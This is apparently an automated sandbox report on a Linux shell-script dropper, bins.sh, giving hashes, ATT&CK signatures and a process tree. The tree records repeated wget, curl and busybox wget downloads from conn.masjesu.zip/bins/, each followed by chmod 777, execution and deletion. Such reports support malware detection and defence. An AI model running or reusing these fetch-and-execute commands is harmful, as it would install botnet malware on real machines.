Analysis
-
max time kernel
69s -
max time network
70s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipsel image:debian9-mipsel-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
16/12/2024, 04:16
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
debian12-armhf-20240221-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian12-mipsel-20240221-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral5
Sample
bins.sh
Resource
debian9-mipsel-20240729-en
Behavioral task
behavioral6
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral7
Sample
bins.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
7c06e835a83b81914ba9a19c15e66d76
-
SHA1
bc618204890c0b179a00d6d253001a6e27197aa1
-
SHA256
cf982818df24e8535c11ddeee9410d1545a54203538acf160c505dcb7ad1cbeb
-
SHA512
4bbe783a5be8061d432c7a90b941059b63a1adc687741621537fbde9f2631c045bccb8ef3d0fcbb9aac75dd15f9ab949678fd3c6b879b3e4ba7d74b585e5f9d2
-
SSDEEP
192:IWWlW1WGWfWLWqVl9MT3rtdp2n3Viuz3WdNdGmX4spz3WdN8X4mWlW1WGWfWLWVh:jAtdp2n3Vi9GOMdp2n3Fu
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:717
-
/bin/rm/bin/rm bins.sh2⤵PID:720
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- System Network Configuration Discovery
PID:722
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- System Network Configuration Discovery
PID:746
-
-
/bin/chmodchmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵PID:750
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- System Network Configuration Discovery
PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- System Network Configuration Discovery
PID:755
-
-
/bin/chmodchmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- Executes dropped EXE
PID:757
-
-
/bin/rmrm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵PID:758
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- System Network Configuration Discovery
PID:759
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:760
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵PID:762
-
-
/bin/chmodchmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵PID:765
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- System Network Configuration Discovery
PID:766
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:769
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- System Network Configuration Discovery
PID:777
-
-
/bin/chmodchmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- Executes dropped EXE
PID:781
-
-
/bin/rmrm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵PID:784
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵PID:785
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵PID:799
-
-
/bin/chmodchmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O./lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- Executes dropped EXE
PID:804
-
-
/bin/rmrm lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵PID:807
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵PID:808
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- System Network Configuration Discovery
PID:824
-
-
/bin/chmodchmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵PID:831
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- System Network Configuration Discovery
PID:832
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- System Network Configuration Discovery
PID:835
-
-
/bin/chmodchmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- Executes dropped EXE
PID:837
-
-
/bin/rmrm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵PID:841
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- System Network Configuration Discovery
PID:842
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- System Network Configuration Discovery
PID:855
-
-
/bin/chmodchmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵PID:863
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- System Network Configuration Discovery
PID:865
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- System Network Configuration Discovery
PID:880
-
-
/bin/chmodchmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵PID:885
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵PID:886
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵PID:892
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- System Network Configuration Discovery
PID:893
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- System Network Configuration Discovery
PID:896
-
-
/bin/chmodchmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- System Network Configuration Discovery
PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- System Network Configuration Discovery
PID:917
-
-
/bin/chmodchmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵PID:924
-
-
/bin/chmodchmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵PID:927
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- System Network Configuration Discovery
PID:928
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵PID:931
-
-
/bin/chmodchmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵PID:934
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵PID:935
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- System Network Configuration Discovery
PID:938
-
-
/bin/chmodchmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵PID:941
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- System Network Configuration Discovery
PID:945
-
-
/bin/chmodchmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵PID:948
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- System Network Configuration Discovery
PID:949
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- System Network Configuration Discovery
PID:952
-
-
/bin/chmodchmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵PID:955
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵PID:956
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- System Network Configuration Discovery
PID:959
-
-
/bin/chmodchmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵PID:962
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- System Network Configuration Discovery
PID:963
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵PID:966
-
-
/bin/chmodchmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵PID:969
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- System Network Configuration Discovery
PID:970
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵PID:973
-
-
/bin/chmodchmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵PID:976
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- System Network Configuration Discovery
PID:977
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- System Network Configuration Discovery
PID:980
-
-
/bin/chmodchmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵PID:983
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- System Network Configuration Discovery
PID:984
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- System Network Configuration Discovery
PID:987
-
-
/bin/chmodchmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵PID:990
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- System Network Configuration Discovery
PID:991
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵PID:994
-
-
/bin/chmodchmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- File and Directory Permissions Modification
PID:995
-
-
/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- Executes dropped EXE
PID:996
-
-
/bin/rmrm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- System Network Configuration Discovery
PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- System Network Configuration Discovery
PID:1001
-
-
/bin/chmodchmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- Executes dropped EXE
PID:1003
-
-
/bin/rmrm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵PID:1004
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- System Network Configuration Discovery
PID:1005
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1006
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵PID:1008
-
-
/bin/chmodchmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- File and Directory Permissions Modification
PID:1009
-
-
/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- Executes dropped EXE
PID:1010
-
-
/bin/rmrm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵PID:1011
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- System Network Configuration Discovery
PID:1012
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1013
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- System Network Configuration Discovery
PID:1015
-
-
/bin/chmodchmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- File and Directory Permissions Modification
PID:1016
-
-
/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O./lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- Executes dropped EXE
PID:1017
-
-
/bin/rmrm lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵PID:1018
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
